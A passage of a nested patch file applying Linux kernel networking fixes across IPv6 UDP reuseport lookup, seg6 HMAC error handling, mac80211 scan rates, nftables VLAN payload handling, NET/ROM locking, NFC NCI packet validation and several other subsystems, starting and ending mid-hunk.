+ 	sk_nulls_for_each_rcu(sk, node, &ilb2->nulls_head) {
+ 		score = compute_score(sk, net, hnum, daddr, dif, sdif);
+ 		if (score > hiscore) {
+-			result = lookup_reuseport(net, sk, skb, doff,
+-						  saddr, sport, daddr, hnum);
++			result = inet6_lookup_reuseport(net, sk, skb, doff,
++							saddr, sport, daddr, hnum, inet6_ehashfn);
+ 			if (result)
+ 				return result;
+ 
+@@ -175,7 +181,8 @@ static inline struct sock *inet6_lookup_run_bpf(struct net *net,
+ 	if (no_reuseport || IS_ERR_OR_NULL(sk))
+ 		return sk;
+ 
+-	reuse_sk = lookup_reuseport(net, sk, skb, doff, saddr, sport, daddr, hnum);
++	reuse_sk = inet6_lookup_reuseport(net, sk, skb, doff,
++					  saddr, sport, daddr, hnum, inet6_ehashfn);
+ 	if (reuse_sk)
+ 		sk = reuse_sk;
+ 	return sk;
+diff --git a/net/ipv6/reassembly.c b/net/ipv6/reassembly.c
+index ff866f2a879e0..32ba4417eb1de 100644
+--- a/net/ipv6/reassembly.c
++++ b/net/ipv6/reassembly.c
+@@ -364,7 +364,7 @@ static int ipv6_frag_rcv(struct sk_buff *skb)
+ 	 * the source of the fragment, with the Pointer field set to zero.
+ 	 */
+ 	nexthdr = hdr->nexthdr;
+-	if (ipv6frag_thdr_truncated(skb, skb_transport_offset(skb), &nexthdr)) {
++	if (ipv6frag_thdr_truncated(skb, skb_network_offset(skb) + sizeof(struct ipv6hdr), &nexthdr)) {
+ 		__IP6_INC_STATS(net, __in6_dev_get_safely(skb->dev),
+ 				IPSTATS_MIB_INHDRERRORS);
+ 		icmpv6_param_prob(skb, ICMPV6_HDR_INCOMP, 0);
+diff --git a/net/ipv6/seg6.c b/net/ipv6/seg6.c
+index 35508abd76f43..a31521e270f78 100644
+--- a/net/ipv6/seg6.c
++++ b/net/ipv6/seg6.c
+@@ -551,6 +551,8 @@ int __init seg6_init(void)
+ #endif
+ #ifdef CONFIG_IPV6_SEG6_LWTUNNEL
+ out_unregister_genl:
++#endif
++#if IS_ENABLED(CONFIG_IPV6_SEG6_LWTUNNEL) || IS_ENABLED(CONFIG_IPV6_SEG6_HMAC)
+ 	genl_unregister_family(&seg6_genl_family);
+ #endif
+ out_unregister_pernet:
+@@ -564,8 +566,9 @@ void seg6_exit(void)
+ 	seg6_hmac_exit();
+ #endif
+ #ifdef CONFIG_IPV6_SEG6_LWTUNNEL
++	seg6_local_exit();
+ 	seg6_iptunnel_exit();
+ #endif
+-	unregister_pernet_subsys(&ip6_segments_ops);
+ 	genl_unregister_family(&seg6_genl_family);
++	unregister_pernet_subsys(&ip6_segments_ops);
+ }
+diff --git a/net/ipv6/seg6_hmac.c b/net/ipv6/seg6_hmac.c
+index d43c50a7310d6..3c3800223e0e0 100644
+--- a/net/ipv6/seg6_hmac.c
++++ b/net/ipv6/seg6_hmac.c
+@@ -354,6 +354,7 @@ static int seg6_hmac_init_algo(void)
+ 	struct crypto_shash *tfm;
+ 	struct shash_desc *shash;
+ 	int i, alg_count, cpu;
++	int ret = -ENOMEM;
+ 
+ 	alg_count = ARRAY_SIZE(hmac_algos);
+ 
+@@ -364,12 +365,14 @@ static int seg6_hmac_init_algo(void)
+ 		algo = &hmac_algos[i];
+ 		algo->tfms = alloc_percpu(struct crypto_shash *);
+ 		if (!algo->tfms)
+-			return -ENOMEM;
++			goto error_out;
+ 
+ 		for_each_possible_cpu(cpu) {
+ 			tfm = crypto_alloc_shash(algo->name, 0, 0);
+-			if (IS_ERR(tfm))
+-				return PTR_ERR(tfm);
++			if (IS_ERR(tfm)) {
++				ret = PTR_ERR(tfm);
++				goto error_out;
++			}
+ 			p_tfm = per_cpu_ptr(algo->tfms, cpu);
+ 			*p_tfm = tfm;
+ 		}
+@@ -381,18 +384,22 @@ static int seg6_hmac_init_algo(void)
+ 
+ 		algo->shashs = alloc_percpu(struct shash_desc *);
+ 		if (!algo->shashs)
+-			return -ENOMEM;
++			goto error_out;
+ 
+ 		for_each_possible_cpu(cpu) {
+ 			shash = kzalloc_node(shsize, GFP_KERNEL,
+ 					     cpu_to_node(cpu));
+ 			if (!shash)
+-				return -ENOMEM;
++				goto error_out;
+ 			*per_cpu_ptr(algo->shashs, cpu) = shash;
+ 		}
+ 	}
+ 
+ 	return 0;
++
++error_out:
++	seg6_hmac_exit();
++	return ret;
+ }
+ 
+ int __init seg6_hmac_init(void)
+@@ -410,22 +417,29 @@ int __net_init seg6_hmac_net_init(struct net *net)
+ void seg6_hmac_exit(void)
+ {
+ 	struct seg6_hmac_algo *algo = NULL;
++	struct crypto_shash *tfm;
++	struct shash_desc *shash;
+ 	int i, alg_count, cpu;
+ 
+ 	alg_count = ARRAY_SIZE(hmac_algos);
+ 	for (i = 0; i < alg_count; i++) {
+ 		algo = &hmac_algos[i];
+-		for_each_possible_cpu(cpu) {
+-			struct crypto_shash *tfm;
+-			struct shash_desc *shash;
+ 
+-			shash = *per_cpu_ptr(algo->shashs, cpu);
+-			kfree(shash);
+-			tfm = *per_cpu_ptr(algo->tfms, cpu);
+-			crypto_free_shash(tfm);
++		if (algo->shashs) {
++			for_each_possible_cpu(cpu) {
++				shash = *per_cpu_ptr(algo->shashs, cpu);
++				kfree(shash);
++			}
++			free_percpu(algo->shashs);
++		}
++
++		if (algo->tfms) {
++			for_each_possible_cpu(cpu) {
++				tfm = *per_cpu_ptr(algo->tfms, cpu);
++				crypto_free_shash(tfm);
++			}
++			free_percpu(algo->tfms);
+ 		}
+-		free_percpu(algo->tfms);
+-		free_percpu(algo->shashs);
+ 	}
+ }
+ EXPORT_SYMBOL(seg6_hmac_exit);
+diff --git a/net/ipv6/seg6_iptunnel.c b/net/ipv6/seg6_iptunnel.c
+index 34db881204d24..5924407b87b07 100644
+--- a/net/ipv6/seg6_iptunnel.c
++++ b/net/ipv6/seg6_iptunnel.c
+@@ -459,10 +459,8 @@ static int seg6_input_core(struct net *net, struct sock *sk,
+ 	int err;
+ 
+ 	err = seg6_do_srh(skb);
+-	if (unlikely(err)) {
+-		kfree_skb(skb);
+-		return err;
+-	}
++	if (unlikely(err))
++		goto drop;
+ 
+ 	slwt = seg6_lwt_lwtunnel(orig_dst->lwtstate);
+ 
+@@ -487,7 +485,7 @@ static int seg6_input_core(struct net *net, struct sock *sk,
+ 
+ 	err = skb_cow_head(skb, LL_RESERVED_SPACE(dst->dev));
+ 	if (unlikely(err))
+-		return err;
++		goto drop;
+ 
+ 	if (static_branch_unlikely(&nf_hooks_lwtunnel_enabled))
+ 		return NF_HOOK(NFPROTO_IPV6, NF_INET_LOCAL_OUT,
+@@ -495,6 +493,9 @@ static int seg6_input_core(struct net *net, struct sock *sk,
+ 			       skb_dst(skb)->dev, seg6_input_finish);
+ 
+ 	return seg6_input_finish(dev_net(skb->dev), NULL, skb);
++drop:
++	kfree_skb(skb);
++	return err;
+ }
+ 
+ static int seg6_input_nf(struct sk_buff *skb)
+diff --git a/net/ipv6/udp.c b/net/ipv6/udp.c
+index 504ea27d08fb0..f55d08d2096ae 100644
+--- a/net/ipv6/udp.c
++++ b/net/ipv6/udp.c
+@@ -70,11 +70,12 @@ int udpv6_init_sock(struct sock *sk)
+ 	return 0;
+ }
+ 
+-static u32 udp6_ehashfn(const struct net *net,
+-			const struct in6_addr *laddr,
+-			const u16 lport,
+-			const struct in6_addr *faddr,
+-			const __be16 fport)
++INDIRECT_CALLABLE_SCOPE
++u32 udp6_ehashfn(const struct net *net,
++		 const struct in6_addr *laddr,
++		 const u16 lport,
++		 const struct in6_addr *faddr,
++		 const __be16 fport)
+ {
+ 	static u32 udp6_ehash_secret __read_mostly;
+ 	static u32 udp_ipv6_hash_secret __read_mostly;
+@@ -159,24 +160,6 @@ static int compute_score(struct sock *sk, struct net *net,
+ 	return score;
+ }
+ 
+-static struct sock *lookup_reuseport(struct net *net, struct sock *sk,
+-				     struct sk_buff *skb,
+-				     const struct in6_addr *saddr,
+-				     __be16 sport,
+-				     const struct in6_addr *daddr,
+-				     unsigned int hnum)
+-{
+-	struct sock *reuse_sk = NULL;
+-	u32 hash;
+-
+-	if (sk->sk_reuseport && sk->sk_state != TCP_ESTABLISHED) {
+-		hash = udp6_ehashfn(net, daddr, hnum, saddr, sport);
+-		reuse_sk = reuseport_select_sock(sk, hash, skb,
+-						 sizeof(struct udphdr));
+-	}
+-	return reuse_sk;
+-}
+-
+ /* called with rcu_read_lock() */
+ static struct sock *udp6_lib_lookup2(struct net *net,
+ 		const struct in6_addr *saddr, __be16 sport,
+@@ -186,15 +169,28 @@ static struct sock *udp6_lib_lookup2(struct net *net,
+ {
+ 	struct sock *sk, *result;
+ 	int score, badness;
++	bool need_rescore;
+ 
+ 	result = NULL;
+ 	badness = -1;
+ 	udp_portaddr_for_each_entry_rcu(sk, &hslot2->head) {
+-		score = compute_score(sk, net, saddr, sport,
+-				      daddr, hnum, dif, sdif);
++		need_rescore = false;
++rescore:
++		score = compute_score(need_rescore ? result : sk, net, saddr,
++				      sport, daddr, hnum, dif, sdif);
+ 		if (score > badness) {
+ 			badness = score;
+-			result = lookup_reuseport(net, sk, skb, saddr, sport, daddr, hnum);
++
++			if (need_rescore)
++				continue;
++
++			if (sk->sk_state == TCP_ESTABLISHED) {
++				result = sk;
++				continue;
++			}
++
++			result = inet6_lookup_reuseport(net, sk, skb, sizeof(struct udphdr),
++							saddr, sport, daddr, hnum, udp6_ehashfn);
+ 			if (!result) {
+ 				result = sk;
+ 				continue;
+@@ -208,8 +204,14 @@ static struct sock *udp6_lib_lookup2(struct net *net,
+ 			if (IS_ERR(result))
+ 				continue;
+ 
+-			badness = compute_score(sk, net, saddr, sport,
+-						daddr, hnum, dif, sdif);
++			/* compute_score() is too long a function to be
++			 * inlined, and calling it again here yields
++			 * measurable overhead for some workloads. Work
++			 * around it by jumping backwards to rescore
++			 * 'result'.
++			 */
++			need_rescore = true;
++			goto rescore;
+ 		}
+ 	}
+ 	return result;
+@@ -234,7 +236,8 @@ static inline struct sock *udp6_lookup_run_bpf(struct net *net,
+ 	if (no_reuseport || IS_ERR_OR_NULL(sk))
+ 		return sk;
+ 
+-	reuse_sk = lookup_reuseport(net, sk, skb, saddr, sport, daddr, hnum);
++	reuse_sk = inet6_lookup_reuseport(net, sk, skb, sizeof(struct udphdr),
++					  saddr, sport, daddr, hnum, udp6_ehashfn);
+ 	if (reuse_sk)
+ 		sk = reuse_sk;
+ 	return sk;
+diff --git a/net/mac80211/mlme.c b/net/mac80211/mlme.c
+index f25dc6931a5b1..9a5530ca2f6b2 100644
+--- a/net/mac80211/mlme.c
++++ b/net/mac80211/mlme.c
+@@ -5528,7 +5528,8 @@ static void ieee80211_rx_mgmt_beacon(struct ieee80211_link_data *link,
+ 			link->u.mgd.dtim_period = elems->dtim_period;
+ 		link->u.mgd.have_beacon = true;
+ 		ifmgd->assoc_data->need_beacon = false;
+-		if (ieee80211_hw_check(&local->hw, TIMING_BEACON_ONLY)) {
++		if (ieee80211_hw_check(&local->hw, TIMING_BEACON_ONLY) &&
++		    !ieee80211_is_s1g_beacon(hdr->frame_control)) {
+ 			link->conf->sync_tsf =
+ 				le64_to_cpu(mgmt->u.beacon.timestamp);
+ 			link->conf->sync_device_ts =
+diff --git a/net/mac80211/rate.c b/net/mac80211/rate.c
+index 9d33fd2377c88..a2bc9c5d92b8b 100644
+--- a/net/mac80211/rate.c
++++ b/net/mac80211/rate.c
+@@ -877,6 +877,7 @@ void ieee80211_get_tx_rates(struct ieee80211_vif *vif,
+ 	struct ieee80211_sub_if_data *sdata;
+ 	struct ieee80211_tx_info *info = IEEE80211_SKB_CB(skb);
+ 	struct ieee80211_supported_band *sband;
++	u32 mask = ~0;
+ 
+ 	rate_control_fill_sta_table(sta, info, dest, max_rates);
+ 
+@@ -889,9 +890,12 @@ void ieee80211_get_tx_rates(struct ieee80211_vif *vif,
+ 	if (ieee80211_is_tx_data(skb))
+ 		rate_control_apply_mask(sdata, sta, sband, dest, max_rates);
+ 
++	if (!(info->control.flags & IEEE80211_TX_CTRL_SCAN_TX))
++		mask = sdata->rc_rateidx_mask[info->band];
++
+ 	if (dest[0].idx < 0)
+ 		__rate_control_send_low(&sdata->local->hw, sband, sta, info,
+-					sdata->rc_rateidx_mask[info->band]);
++					mask);
+ 
+ 	if (sta)
+ 		rate_fixup_ratelist(vif, sband, info, dest, max_rates);
+diff --git a/net/mac80211/scan.c b/net/mac80211/scan.c
+index c37e2576f1c13..933d02d7c1284 100644
+--- a/net/mac80211/scan.c
++++ b/net/mac80211/scan.c
+@@ -647,6 +647,7 @@ static void ieee80211_send_scan_probe_req(struct ieee80211_sub_if_data *sdata,
+ 				cpu_to_le16(IEEE80211_SN_TO_SEQ(sn));
+ 		}
+ 		IEEE80211_SKB_CB(skb)->flags |= tx_flags;
++		IEEE80211_SKB_CB(skb)->control.flags |= IEEE80211_TX_CTRL_SCAN_TX;
+ 		ieee80211_tx_skb_tid_band(sdata, skb, 7, channel->band);
+ 	}
+ }
+diff --git a/net/mac80211/tx.c b/net/mac80211/tx.c
+index 3d62e8b718740..419baf8efddea 100644
+--- a/net/mac80211/tx.c
++++ b/net/mac80211/tx.c
+@@ -720,11 +720,16 @@ ieee80211_tx_h_rate_ctrl(struct ieee80211_tx_data *tx)
+ 	txrc.bss_conf = &tx->sdata->vif.bss_conf;
+ 	txrc.skb = tx->skb;
+ 	txrc.reported_rate.idx = -1;
+-	txrc.rate_idx_mask = tx->sdata->rc_rateidx_mask[info->band];
+ 
+-	if (tx->sdata->rc_has_mcs_mask[info->band])
+-		txrc.rate_idx_mcs_mask =
+-			tx->sdata->rc_rateidx_mcs_mask[info->band];
++	if (unlikely(info->control.flags & IEEE80211_TX_CTRL_SCAN_TX)) {
++		txrc.rate_idx_mask = ~0;
++	} else {
++		txrc.rate_idx_mask = tx->sdata->rc_rateidx_mask[info->band];
++
++		if (tx->sdata->rc_has_mcs_mask[info->band])
++			txrc.rate_idx_mcs_mask =
++				tx->sdata->rc_rateidx_mcs_mask[info->band];
++	}
+ 
+ 	txrc.bss = (tx->sdata->vif.type == NL80211_IFTYPE_AP ||
+ 		    tx->sdata->vif.type == NL80211_IFTYPE_MESH_POINT ||
+diff --git a/net/mptcp/sockopt.c b/net/mptcp/sockopt.c
+index 30374fd44228f..e59e46e07b5c9 100644
+--- a/net/mptcp/sockopt.c
++++ b/net/mptcp/sockopt.c
+@@ -179,8 +179,6 @@ static int mptcp_setsockopt_sol_socket_int(struct mptcp_sock *msk, int optname,
+ 
+ 	switch (optname) {
+ 	case SO_KEEPALIVE:
+-		mptcp_sol_socket_sync_intval(msk, optname, val);
+-		return 0;
+ 	case SO_DEBUG:
+ 	case SO_MARK:
+ 	case SO_PRIORITY:
+diff --git a/net/netfilter/nfnetlink_queue.c b/net/netfilter/nfnetlink_queue.c
+index 87a9009d5234d..5bc342cb13767 100644
+--- a/net/netfilter/nfnetlink_queue.c
++++ b/net/netfilter/nfnetlink_queue.c
+@@ -167,7 +167,9 @@ instance_destroy_rcu(struct rcu_head *head)
+ 	struct nfqnl_instance *inst = container_of(head, struct nfqnl_instance,
+ 						   rcu);
+ 
++	rcu_read_lock();
+ 	nfqnl_flush(inst, NULL, 0);
++	rcu_read_unlock();
+ 	kfree(inst);
+ 	module_put(THIS_MODULE);
+ }
+diff --git a/net/netfilter/nft_fib.c b/net/netfilter/nft_fib.c
+index 5748415f74d0b..0f17ace972276 100644
+--- a/net/netfilter/nft_fib.c
++++ b/net/netfilter/nft_fib.c
+@@ -34,11 +34,9 @@ int nft_fib_validate(const struct nft_ctx *ctx, const struct nft_expr *expr,
+ 	switch (priv->result) {
+ 	case NFT_FIB_RESULT_OIF:
+ 	case NFT_FIB_RESULT_OIFNAME:
+-		hooks = (1 << NF_INET_PRE_ROUTING);
+-		if (priv->flags & NFTA_FIB_F_IIF) {
+-			hooks |= (1 << NF_INET_LOCAL_IN) |
+-				 (1 << NF_INET_FORWARD);
+-		}
++		hooks = (1 << NF_INET_PRE_ROUTING) |
++			(1 << NF_INET_LOCAL_IN) |
++			(1 << NF_INET_FORWARD);
+ 		break;
+ 	case NFT_FIB_RESULT_ADDRTYPE:
+ 		if (priv->flags & NFTA_FIB_F_IIF)
+diff --git a/net/netfilter/nft_payload.c b/net/netfilter/nft_payload.c
+index f44f2eaf32172..1b001dd2bc9ad 100644
+--- a/net/netfilter/nft_payload.c
++++ b/net/netfilter/nft_payload.c
+@@ -44,36 +44,27 @@ nft_payload_copy_vlan(u32 *d, const struct sk_buff *skb, u8 offset, u8 len)
+ 	int mac_off = skb_mac_header(skb) - skb->data;
+ 	u8 *vlanh, *dst_u8 = (u8 *) d;
+ 	struct vlan_ethhdr veth;
+-	u8 vlan_hlen = 0;
+-
+-	if ((skb->protocol == htons(ETH_P_8021AD) ||
+-	     skb->protocol == htons(ETH_P_8021Q)) &&
+-	    offset >= VLAN_ETH_HLEN && offset < VLAN_ETH_HLEN + VLAN_HLEN)
+-		vlan_hlen += VLAN_HLEN;
+ 
+ 	vlanh = (u8 *) &veth;
+-	if (offset < VLAN_ETH_HLEN + vlan_hlen) {
++	if (offset < VLAN_ETH_HLEN) {
+ 		u8 ethlen = len;
+ 
+-		if (vlan_hlen &&
+-		    skb_copy_bits(skb, mac_off, &veth, VLAN_ETH_HLEN) < 0)
+-			return false;
+-		else if (!nft_payload_rebuild_vlan_hdr(skb, mac_off, &veth))
++		if (!nft_payload_rebuild_vlan_hdr(skb, mac_off, &veth))
+ 			return false;
+ 
+-		if (offset + len > VLAN_ETH_HLEN + vlan_hlen)
+-			ethlen -= offset + len - VLAN_ETH_HLEN - vlan_hlen;
++		if (offset + len > VLAN_ETH_HLEN)
++			ethlen -= offset + len - VLAN_ETH_HLEN;
+ 
+-		memcpy(dst_u8, vlanh + offset - vlan_hlen, ethlen);
++		memcpy(dst_u8, vlanh + offset, ethlen);
+ 
+ 		len -= ethlen;
+ 		if (len == 0)
+ 			return true;
+ 
+ 		dst_u8 += ethlen;
+-		offset = ETH_HLEN + vlan_hlen;
++		offset = ETH_HLEN;
+ 	} else {
+-		offset -= VLAN_HLEN + vlan_hlen;
++		offset -= VLAN_HLEN;
+ 	}
+ 
+ 	return skb_copy_bits(skb, offset + mac_off, dst_u8, len) == 0;
+@@ -118,6 +109,17 @@ static int nft_payload_inner_offset(const struct nft_pktinfo *pkt)
+ 	return pkt->inneroff;
+ }
+ 
++static bool nft_payload_need_vlan_adjust(u32 offset, u32 len)
++{
++	unsigned int boundary = offset + len;
++
++	/* data past ether src/dst requested, copy needed */
++	if (boundary > offsetof(struct ethhdr, h_proto))
++		return true;
++
++	return false;
++}
++
+ void nft_payload_eval(const struct nft_expr *expr,
+ 		      struct nft_regs *regs,
+ 		      const struct nft_pktinfo *pkt)
+@@ -135,7 +137,8 @@ void nft_payload_eval(const struct nft_expr *expr,
+ 		if (!skb_mac_header_was_set(skb) || skb_mac_header_len(skb) == 0)
+ 			goto err;
+ 
+-		if (skb_vlan_tag_present(skb)) {
++		if (skb_vlan_tag_present(skb) &&
++		    nft_payload_need_vlan_adjust(priv->offset, priv->len)) {
+ 			if (!nft_payload_copy_vlan(dest, skb,
+ 						   priv->offset, priv->len))
+ 				goto err;
+@@ -665,21 +668,89 @@ static int nft_payload_csum_inet(struct sk_buff *skb, const u32 *src,
+ 	return 0;
+ }
+ 
++struct nft_payload_set {
++	enum nft_payload_bases	base:8;
++	u8			offset;
++	u8			len;
++	u8			sreg;
++	u8			csum_type;
++	u8			csum_offset;
++	u8			csum_flags;
++};
++
++/* This is not struct vlan_hdr. */
++struct nft_payload_vlan_hdr {
++	__be16			h_vlan_proto;
++	__be16			h_vlan_TCI;
++};
++
++static bool
++nft_payload_set_vlan(const u32 *src, struct sk_buff *skb, u8 offset, u8 len,
++		     int *vlan_hlen)
++{
++	struct nft_payload_vlan_hdr *vlanh;
++	__be16 vlan_proto;
++	u16 vlan_tci;
++
++	if (offset >= offsetof(struct vlan_ethhdr, h_vlan_encapsulated_proto)) {
++		*vlan_hlen = VLAN_HLEN;
++		return true;
++	}
++
++	switch (offset) {
++	case offsetof(struct vlan_ethhdr, h_vlan_proto):
++		if (len == 2) {
++			vlan_proto = nft_reg_load_be16(src);
++			skb->vlan_proto = vlan_proto;
++		} else if (len == 4) {
++			vlanh = (struct nft_payload_vlan_hdr *)src;
++			__vlan_hwaccel_put_tag(skb, vlanh->h_vlan_proto,
++					       ntohs(vlanh->h_vlan_TCI));
++		} else {
++			return false;
++		}
++		break;
++	case offsetof(struct vlan_ethhdr, h_vlan_TCI):
++		if (len != 2)
++			return false;
++
++		vlan_tci = ntohs(nft_reg_load_be16(src));
++		skb->vlan_tci = vlan_tci;
++		break;
++	default:
++		return false;
++	}
++
++	return true;
++}
++
+ static void nft_payload_set_eval(const struct nft_expr *expr,
+ 				 struct nft_regs *regs,
+ 				 const struct nft_pktinfo *pkt)
+ {
+ 	const struct nft_payload_set *priv = nft_expr_priv(expr);
+-	struct sk_buff *skb = pkt->skb;
+ 	const u32 *src = &regs->data[priv->sreg];
+-	int offset, csum_offset;
++	int offset, csum_offset, vlan_hlen = 0;
++	struct sk_buff *skb = pkt->skb;
+ 	__wsum fsum, tsum;
+ 
+ 	switch (priv->base) {
+ 	case NFT_PAYLOAD_LL_HEADER:
+ 		if (!skb_mac_header_was_set(skb))
+ 			goto err;
+-		offset = skb_mac_header(skb) - skb->data;
++
++		if (skb_vlan_tag_present(skb) &&
++		    nft_payload_need_vlan_adjust(priv->offset, priv->len)) {
++			if (!nft_payload_set_vlan(src, skb,
++						  priv->offset, priv->len,
++						  &vlan_hlen))
++				goto err;
++
++			if (!vlan_hlen)
++				return;
++		}
++
++		offset = skb_mac_header(skb) - skb->data - vlan_hlen;
+ 		break;
+ 	case NFT_PAYLOAD_NETWORK_HEADER:
+ 		offset = skb_network_offset(skb);
+diff --git a/net/netrom/nr_route.c b/net/netrom/nr_route.c
+index 70480869ad1c5..bd2b17b219ae9 100644
+--- a/net/netrom/nr_route.c
++++ b/net/netrom/nr_route.c
+@@ -285,22 +285,14 @@ static int __must_check nr_add_node(ax25_address *nr, const char *mnemonic,
+ 	return 0;
+ }
+ 
+-static inline void __nr_remove_node(struct nr_node *nr_node)
++static void nr_remove_node_locked(struct nr_node *nr_node)
+ {
++	lockdep_assert_held(&nr_node_list_lock);
++
+ 	hlist_del_init(&nr_node->node_node);
+ 	nr_node_put(nr_node);
+ }
+ 
+-#define nr_remove_node_locked(__node) \
+-	__nr_remove_node(__node)
+-
+-static void nr_remove_node(struct nr_node *nr_node)
+-{
+-	spin_lock_bh(&nr_node_list_lock);
+-	__nr_remove_node(nr_node);
+-	spin_unlock_bh(&nr_node_list_lock);
+-}
+-
+ static inline void __nr_remove_neigh(struct nr_neigh *nr_neigh)
+ {
+ 	hlist_del_init(&nr_neigh->neigh_node);
+@@ -339,6 +331,7 @@ static int nr_del_node(ax25_address *callsign, ax25_address *neighbour, struct n
+ 		return -EINVAL;
+ 	}
+ 
++	spin_lock_bh(&nr_node_list_lock);
+ 	nr_node_lock(nr_node);
+ 	for (i = 0; i < nr_node->count; i++) {
+ 		if (nr_node->routes[i].neighbour == nr_neigh) {
+@@ -352,7 +345,7 @@ static int nr_del_node(ax25_address *callsign, ax25_address *neighbour, struct n
+ 			nr_node->count--;
+ 
+ 			if (nr_node->count == 0) {
+-				nr_remove_node(nr_node);
++				nr_remove_node_locked(nr_node);
+ 			} else {
+ 				switch (i) {
+ 				case 0:
+@@ -367,12 +360,14 @@ static int nr_del_node(ax25_address *callsign, ax25_address *neighbour, struct n
+ 				nr_node_put(nr_node);
+ 			}
+ 			nr_node_unlock(nr_node);
++			spin_unlock_bh(&nr_node_list_lock);
+ 
+ 			return 0;
+ 		}
+ 	}
+ 	nr_neigh_put(nr_neigh);
+ 	nr_node_unlock(nr_node);
++	spin_unlock_bh(&nr_node_list_lock);
+ 	nr_node_put(nr_node);
+ 
+ 	return -EINVAL;
+diff --git a/net/nfc/nci/core.c b/net/nfc/nci/core.c
+index f76a2d8060340..6196bb512dfc1 100644
+--- a/net/nfc/nci/core.c
++++ b/net/nfc/nci/core.c
+@@ -1462,6 +1462,19 @@ int nci_core_ntf_packet(struct nci_dev *ndev, __u16 opcode,
+ 				 ndev->ops->n_core_ops);
+ }
+ 
++static bool nci_valid_size(struct sk_buff *skb)
++{
++	unsigned int hdr_size = NCI_CTRL_HDR_SIZE;
++	BUILD_BUG_ON(NCI_CTRL_HDR_SIZE != NCI_DATA_HDR_SIZE);
++
++	if (skb->len < hdr_size ||
++	    !nci_plen(skb->data) ||
++	    skb->len < hdr_size + nci_plen(skb->data)) {
++		return false;
++	}
++	return true;
++}
++
+ /* ---- NCI TX Data worker thread ---- */
+ 
+ static void nci_tx_work(struct work_struct *work)
+@@ -1512,9 +1525,9 @@ static void nci_rx_work(struct work_struct *work)
+ 		nfc_send_to_raw_sock(ndev->nfc_dev, skb,
+ 				     RAW_PAYLOAD_NCI, NFC_DIRECTION_RX);
+ 
+-		if (!nci_plen(skb->data)) {
++		if (!nci_valid_size(skb)) {
+ 			kfree_skb(skb);
+-			break;
++			continue;
+ 		}
+ 
+ 		/* Process frame */
+diff --git a/net/openvswitch/actions.c b/net/openvswitch/actions.c
+index a8cf9a88758ef..21102ffe44709 100644
+--- a/net/openvswitch/actions.c
++++ b/net/openvswitch/actions.c
+@@ -924,6 +924,12 @@ static void do_output(struct datapath *dp, struct sk_buff *skb, int out_port,
+ 				pskb_trim(skb, ovs_mac_header_len(key));
+ 		}
+ 
++		/* Need to set the pkt_type to involve the routing layer.  The
++		 * packet movement through the OVS datapath doesn't generally
++		 * use routing, but this is needed for tunnel cases.
++		 */
++		skb->pkt_type = PACKET_OUTGOING;
++
+ 		if (likely(!mru ||
+ 		           (skb->len <= mru + vport->dev->hard_header_len))) {
+ 			ovs_vport_send(vport, skb, ovs_key_mac_proto(key));
+diff --git a/net/openvswitch/flow.c b/net/openvswitch/flow.c
+index e20d1a9734175..78960a8a38925 100644
+--- a/net/openvswitch/flow.c
++++ b/net/openvswitch/flow.c
+@@ -558,7 +558,6 @@ static int parse_icmpv6(struct sk_buff *skb, struct sw_flow_key *key,
+ 	 */
+ 	key->tp.src = htons(icmp->icmp6_type);
+ 	key->tp.dst = htons(icmp->icmp6_code);
+-	memset(&key->ipv6.nd, 0, sizeof(key->ipv6.nd));
+ 
+ 	if (icmp->icmp6_code == 0 &&
+ 	    (icmp->icmp6_type == NDISC_NEIGHBOUR_SOLICITATION ||
+@@ -567,6 +566,8 @@ static int parse_icmpv6(struct sk_buff *skb, struct sw_flow_key *key,
+ 		struct nd_msg *nd;
+ 		int offset;
+ 
++		memset(&key->ipv6.nd, 0, sizeof(key->ipv6.nd));
++
+ 		/* In order to process neighbor discovery options, we need the
+ 		 * entire packet.
+ 		 */
+diff --git a/net/packet/af_packet.c b/net/packet/af_packet.c
+index 7188ca8d84693..8888c09931ce3 100644
+--- a/net/packet/af_packet.c
++++ b/net/packet/af_packet.c
+@@ -2528,8 +2528,7 @@ static void tpacket_destruct_skb(struct sk_buff *skb)
+ 		ts = __packet_set_timestamp(po, ph, skb);
+ 		__packet_set_status(po, ph, TP_STATUS_AVAILABLE | ts);
+ 
+-		if (!packet_read_pending(&po->tx_ring))
+-			complete(&po->skb_completion);
++		complete(&po->skb_completion);
+ 	}
+ 
+ 	sock_wfree(skb);
+diff --git a/net/qrtr/ns.c b/net/qrtr/ns.c
+index 4a13b9f7abb44..3c513e7ca2d5c 100644
+--- a/net/qrtr/ns.c
++++ b/net/qrtr/ns.c
+@@ -807,6 +807,24 @@ int qrtr_ns_init(void)
+ 	if (ret < 0)
+ 		goto err_wq;
+ 
++	/* The qrtr ns socket's owner and creator are the same module, so we
++	 * have to decrease the qrtr module reference count to guarantee that
++	 * it remains zero after the ns socket is created; otherwise, "rmmod"
++	 * cannot remove the qrtr module after it has been inserted
++	 * successfully.
++	 *
++	 * However, the reference count is increased twice in
++	 * sock_create_kern(): once for the owner of the qrtr socket's
++	 * proto_ops struct, and once for the owner of the qrtr proto struct.
++	 * Therefore, we must decrement the module reference count twice to
++	 * ensure that it stays zero after the server's listening socket is
++	 * created. Of course, we must also bump the module reference count
++	 * twice before the socket is closed.
++	 */
++	module_put(qrtr_ns.sock->ops->owner);
++	module_put(qrtr_ns.sock->sk->sk_prot_creator->owner);
++
+ 	return 0;
+ 
+ err_wq:
+@@ -821,6 +839,15 @@ void qrtr_ns_remove(void)
+ {
+ 	cancel_work_sync(&qrtr_ns.work);
+ 	destroy_workqueue(qrtr_ns.workqueue);
++
++	/* sock_release() expects the two references that were put during
++	 * qrtr_ns_init(). This function is only called during module remove,
++	 * so try_stop_module() has already set the refcnt to 0. Use
++	 * __module_get() instead of try_module_get() to successfully take two
++	 * references.
++	 */
++	__module_get(qrtr_ns.sock->ops->owner);
++	__module_get(qrtr_ns.sock->sk->sk_prot_creator->owner);
+ 	sock_release(qrtr_ns.sock);
+ }
+ EXPORT_SYMBOL_GPL(qrtr_ns_remove);
+diff --git a/net/sunrpc/auth_gss/svcauth_gss.c b/net/sunrpc/auth_gss/svcauth_gss.c
+index bdc34ea0d939d..d0575747ff0e1 100644
+--- a/net/sunrpc/auth_gss/svcauth_gss.c
++++ b/net/sunrpc/auth_gss/svcauth_gss.c
+@@ -1132,17 +1132,11 @@ gss_read_verf(struct rpc_gss_wire_cred *gc,
+ 
+ static void gss_free_in_token_pages(struct gssp_in_token *in_token)
+ {
+-	u32 inlen;
+ 	int i;
+ 
+ 	i = 0;
+-	inlen = in_token->page_len;
+-	while (inlen) {
+-		if (in_token->pages[i])
+-			put_page(in_token->pages[i]);
